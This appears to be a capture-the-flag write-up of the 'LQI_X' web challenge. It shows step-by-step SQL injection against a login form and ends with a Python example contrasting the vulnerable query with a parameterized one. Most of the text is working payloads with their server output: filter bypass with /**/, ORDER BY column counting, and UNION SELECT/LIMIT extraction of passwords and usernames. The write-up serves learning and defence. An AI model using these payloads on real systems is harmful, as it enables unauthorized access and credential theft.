[Web] Bugs Bunny CTF - LQI_X 140


LQI_X
140

Its for your , login and get all you need

task : http://34.253.165.46/LQI_X/

Author: TnMch

We have a login form, so let's start with some tests using curl on the GET parameter username:


(.ctfs) kinyabitch@Debian ~/D/H/ctf> curl -L "http://34.253.165.46/LQI_X/?username=test'&password=" -v
* Trying 34.253.165.46...
* TCP_NODELAY set
* Connected to 34.253.165.46 (34.253.165.46) port 80 (#0)
> GET /LQI_X/?username=test'&password= HTTP/1.1
> Host: 34.253.165.46
> User-Agent: curl/7.52.1
> Accept: */*
>
< HTTP/1.1 200 OK
< Date: Wed, 02 Aug 2017 10:27:30 GMT
< Server: Apache/2.4.18 (Ubuntu)
< Vary: Accept-Encoding
< Content-Length: 749
< Content-Type: text/html; charset=UTF-8
<


<!DOCTYPE html>
<html>

<head>

<meta charset="UTF-8">

<title>SQLI-F - Log-in</title>

<link rel='stylesheet' href='http://codepen.io/assets/libs/fullpage/jquery-ui.css'>

<link rel="stylesheet" href="css/style.css" media="screen" type="text/css" />

</head>

<body>

<div class="login-card">
<h1>Log-in</h1><br>
<form method="GET" action="">
<input type="text" name="username" placeholder="Username">
<input type="password" name="password" placeholder="Password">
<input type="submit" name="login" class="login login-submit" value="login">
</form>

<div class="login-help">
<p> </p>
</div>
</div>

<script src='http://codepen.io/assets/libs/fullpage/jquery_and_jqueryui.js'></script>

</body>

</html>

Nothing seems to change; let's try the password parameter:


curl -L "http://34.253.165.46/LQI_X/?username=test&password=test'%20or%201=1--" -v
* Trying 34.253.165.46...
* TCP_NODELAY set
* Connected to 34.253.165.46 (34.253.165.46) port 80 (#0)
> GET /LQI_X/?username=test&password=test'%20or%201=1-- HTTP/1.1
> Host: 34.253.165.46
> User-Agent: curl/7.52.1
> Accept: */*
>
< HTTP/1.1 200 OK
< Date: Wed, 02 Aug 2017 10:32:28 GMT
< Server: Apache/2.4.18 (Ubuntu)
< Content-Length: 12
< Content-Type: text/html; charset=UTF-8
<
* Curl_http_done: called premature == 0
* Connection #0 to host 34.253.165.46 left intact
No way SOrry

Wow, a custom error message? They must be filtering some characters or even words. Maybe it's the spaces; let's try the comment technique to bypass space filtering:


curl "http://34.253.165.46/LQI_X/?username=test&password=test'/**/or/**/1=1--" -v
* Trying 34.253.165.46...
* TCP_NODELAY set
* Connected to 34.253.165.46 (34.253.165.46) port 80 (#0)
> GET /LQI_X/?username=test&password=test'/**/or/**/1=1-- HTTP/1.1
> Host: 34.253.165.46
> User-Agent: curl/7.52.1
> Accept: */*
>
< HTTP/1.1 200 OK
< Date: Wed, 02 Aug 2017 10:37:24 GMT
< Server: Apache/2.4.18 (Ubuntu)
< Vary: Accept-Encoding
< Content-Length: 753
< Content-Type: text/html; charset=UTF-8
<


<!DOCTYPE html>
<html>

<head>

<meta charset="UTF-8">

<title>SQLI-F - Log-in</title>

<link rel='stylesheet' href='http://codepen.io/assets/libs/fullpage/jquery-ui.css'>

<link rel="stylesheet" href="css/style.css" media="screen" type="text/css" />

</head>

<body>

<div class="login-card">
<h1>Log-in</h1><br>
<form method="GET" action="">
<input type="text" name="username" placeholder="Username">
<input type="password" name="password" placeholder="Password">
<input type="submit" name="login" class="login login-submit" value="login">
</form>

<div class="login-help">
<p> test</p>
</div>
</div>

<script src='http://codepen.io/assets/libs/fullpage/jquery_and_jqueryui.js'></script>

</body>

</html>

It works! Now let's use ORDER BY to find out how many columns the query returns, so we know how many columns to use in our UNION injection. Using curl with the -I option to check the status code of the request: if the query errors we get a 500 (Internal Server Error), otherwise a 200 (OK).


(.ctfs) kinyabitch@Debian ~/D/H/ctf> curl -I "http://34.253.165.46/LQI_X/?username=test&password=test'/**/order/**/by/**/1--"
HTTP/1.1 200 OK
Date: Wed, 02 Aug 2017 10:43:01 GMT
Server: Apache/2.4.18 (Ubuntu)
Content-Type: text/html; charset=UTF-8

(.ctfs) kinyabitch@Debian ~/D/H/ctf> curl -I "http://34.253.165.46/LQI_X/?username=test&password=test'/**/order/**/by/**/2--"
HTTP/1.0 500 Internal Server Error
Date: Wed, 02 Aug 2017 10:43:03 GMT
Server: Apache/2.4.18 (Ubuntu)
Connection: close
Content-Type: text/html; charset=UTF-8

As we can see, the SQL query selects only one column, so the real query must be something similar to “Select username from table_users where username=%s and password=%s”. Now injecting with UNION:


curl "http://34.253.165.46/LQI_X/?username=test&password=test'/**/union/**/select/**/1--"


<!DOCTYPE html>
<html>

<head>

<meta charset="UTF-8">

<title>SQLI-F - Log-in</title>

<link rel='stylesheet' href='http://codepen.io/assets/libs/fullpage/jquery-ui.css'>

<link rel="stylesheet" href="css/style.css" media="screen" type="text/css" />

</head>

<body>

<div class="login-card">
<h1>Log-in</h1><br>
<form method="GET" action="">
<input type="text" name="username" placeholder="Username">
<input type="password" name="password" placeholder="Password">
<input type="submit" name="login" class="login login-submit" value="login">
</form>

<div class="login-help">
<p> 1</p>
</div>
</div>

<script src='http://codepen.io/assets/libs/fullpage/jquery_and_jqueryui.js'></script>

</body>

</html>

It worked! As you can see in the output above, the number “1” showed up. What I tried next was getting the table names from information_schema, but somehow I wasn't able to, so I tried to guess the obvious names: I assumed the table name is users and the columns are probably id, username and password.


curl "http://34.253.165.46/LQI_X/?username=test&password=test'/**/union/**/select
> GET /LQI_X/?username=test&password=test'/**/union/**/select/**/id/**/from/**/users/**/limit/**/0,1-- HTTP/1.1
...
<div class="login-help">
<p> 1</p>
</div>
</div>
...
curl -v "http://34.253.165.46/LQI_X/?username=test&password=test'/**/union/**/select/**/id/**/from/**/users/**/limit/**/1,1--"
> GET /LQI_X/?username=test&password=test'/**/union/**/select/**/id/**/from/**/users/**/limit/**/1,1-- HTTP/1.1
...
<div class="login-help">
<p> 2</p>
</div>
</div>
...
curl -v "http://34.253.165.46/LQI_X/?username=test&password=test'/**/union/**/select/**/id/**/from/**/users/**/limit/**/2,1--"
* Connected to 34.253.165.46 (34.253.165.46) port 80 (#0)
> GET /LQI_X/?username=test&password=test'/**/union/**/select/**/id/**/from/**/users/**/limit/**/2,1-- HTTP/1.1
...
<div class="login-help">
<p> 3</p>
</div>
</div>
...
curl -v "http://34.253.165.46/LQI_X/?username=test&password=test'/**/union/**/select/**/id/**/from/**/users/**/limit/**/3,1--"
> GET /LQI_X/?username=test&password=test'/**/union/**/select/**/id/**/from/**/users/**/limit/**/3,1-- HTTP/1.1
...
<div class="login-help">
<p> 4</p>
</div>
</div>
...
curl -v "http://34.253.165.46/LQI_X/?username=test&password=test'/**/union/**/select/**/id/**/from/**/users/**/limit/**/4,1--"
> GET /LQI_X/?username=test&password=test'/**/union/**/select/**/id/**/from/**/users/**/limit/**/4,1-- HTTP/1.1
...
<div class="login-help">
<p> 5</p>
</div>
</div>
...

As we can see, we successfully leaked the ids from the users table. Now let's try the password column:


(.ctfs) kinyabitch@Debian ~/D/H/ctf> curl -v "http://34.253.165.46/LQI_X/?username=test&password=test'/**/union/**/select/**/password/**/from/**/users/**/limit/**/0,1--"
....
<div class="login-help">
<p> _Easy_I_Dont_Think</p>
</div>
....
(.ctfs) kinyabitch@Debian ~/D/H/ctf> curl -v "http://34.253.165.46/LQI_X/?username=test&password=test'/**/union/**/select/**/password/**/from/**/users/**/limit/**/1,1--"
....
<div class="login-help">
<p> hello</p>
</div>
....
(.ctfs) kinyabitch@Debian ~/D/H/ctf> curl -v "http://34.253.165.46/LQI_X/?username=test&password=test'/**/union/**/select/**/password/**/from/**/users/**/limit/**/2,1--"
....
<div class="login-help">
<p> here</p>
</div>
....
(.ctfs) kinyabitch@Debian ~/D/H/ctf> curl -v "http://34.253.165.46/LQI_X/?username=test&password=test'/**/union/**/select/**/password/**/from/**/users/**/limit/**/3,1--"
....
<div class="login-help">
<p> test</p>
</div>
....
(.ctfs) kinyabitch@Debian ~/D/H/ctf> curl -v "http://34.253.165.46/LQI_X/?username=test&password=test'/**/union/**/select/**/password/**/from/**/users/**/limit/**/4,1--"
....
<div class="login-help">
<p> }</p>
</div>
....

By changing the limit we leaked all the passwords of the users. The first user gave us an incomplete flag; the others don't seem to be part of the flag, since there is no “_” separating the words, so let's assume our flag ends with “_Easy_I_Dont_Think}”.
The rest of the flag must be in the username column!


kinyabitch@Debian ~/D/H/ctf> curl "http://34.253.165.46/LQI_X/?username=test&password=test'/**/union/**/select/**/username/**/from/**/users/**/limit/**/0,1--"
No way SOrry

Fuck, they are filtering the username too? We need another technique to get the username field! Let's make the query always true and then inject a UNION query:


curl "http://34.253.165.46/LQI_X/?username=test&password=test'or/**/1/**/union/**/select/**/\"a\"/**/limit/**/0,1/**/--"
...
<div class="login-help">
<p> Bugs_Bunny{SQLi_Easy_!!</p>
</div>
...
curl "http://34.253.165.46/LQI_X/?username=test&password=test'or/**/1/**/union/**/select/**/\"a\"/**/limit/**/1,1/**/--"
...
<div class="login-help">
<p> a</p>
</div>
...
curl "http://34.253.165.46/LQI_X/?username=test&password=test'or/**/1/**/union/**/select/**/\"a\"/**/limit/**/2,1/**/--"
...
<div class="login-help">
<p> flag_is</p>
</div>

...
curl "http://34.253.165.46/LQI_X/?username=test&password=test'or/**/1/**/union/**/select/**/\"a\"/**/limit/**/3,1/**/--"
...
<div class="login-help">
<p> hello</p>
</div>
...
curl "http://34.253.165.46/LQI_X/?username=test&password=test'or/**/1/**/union/**/select/**/\"a\"/**/limit/**/4,1/**/--"
...
<div class="login-help">
<p> so_2017!</p>
</div>
...

The flag is a combination of some of these strings. After some trial and error trying to log in, I could see that the login table is:


Users
id username password
1 hello hello
2 flag_is here
3 Bugs_Bunny{SQLi_Easy_!! _Easy_I_Dont_Think
4 so_2017! }
5 test test

So the flag is Bugs_Bunny{SQLi_Easy_!!_Easy_I_Dont_Thinkso_2017!}
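The root cause behind the whole chain above is a login query built by string concatenation and "protected" only by a keyword blacklist. The following is an added example, not code from the challenge or its author: it rebuilds the recovered users table in an in-memory SQLite database, models the blacklist the responses suggest (space and the word "username" are assumptions), and shows that the page's comment-bypass and UNION/LIMIT payloads work against the string-built query but yield nothing against a parameterized one.

```python
import sqlite3

# Constructed sample data mirroring the table layout the writeup recovers
# (not the real challenge database).
USERS = [
    (1, "hello", "hello"),
    (2, "flag_is", "here"),
    (3, "Bugs_Bunny{SQLi_Easy_!!", "_Easy_I_Dont_Think"),
    (4, "so_2017!", "}"),
    (5, "test", "test"),
]

def make_db():
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (id INTEGER, username TEXT, password TEXT)")
    conn.executemany("INSERT INTO users VALUES (?, ?, ?)", USERS)
    return conn

# Assumed blacklist: the responses in the writeup suggest that a space or the
# word "username" in a parameter is rejected with this custom message.
BLOCKED = (" ", "username")

def login_vulnerable(conn, username, password):
    """Blacklist plus string-built SQL: the pattern the challenge appears to use."""
    if any(b in username or b in password for b in BLOCKED):
        return "No way SOrry"
    sql = "SELECT username FROM users WHERE username='%s' AND password='%s'" % (username, password)
    row = conn.execute(sql).fetchone()
    return str(row[0]) if row else ""

def login_parameterized(conn, username, password):
    """Hardened form: values travel as bind parameters and are never parsed as SQL."""
    sql = "SELECT username FROM users WHERE username=? AND password=?"
    row = conn.execute(sql, (username, password)).fetchone()
    return str(row[0]) if row else ""

def leak_column(login, conn, column):
    """Replay the writeup's UNION/LIMIT loop against a login function.

    Returns the set of values the login page echoes back; for the
    parameterized login the payload is just a non-matching password.
    """
    leaked = set()
    for offset in range(len(USERS) + 1):
        payload = "test'/**/union/**/select/**/%s/**/from/**/users/**/limit/**/%d,1--" % (column, offset)
        value = login(conn, "test", payload)
        if value:
            leaked.add(value)
    return leaked
```

SQLite, like MySQL, treats `/**/` as whitespace, which is why a blacklist on the space character changes nothing; only the bind-parameter version removes the injection.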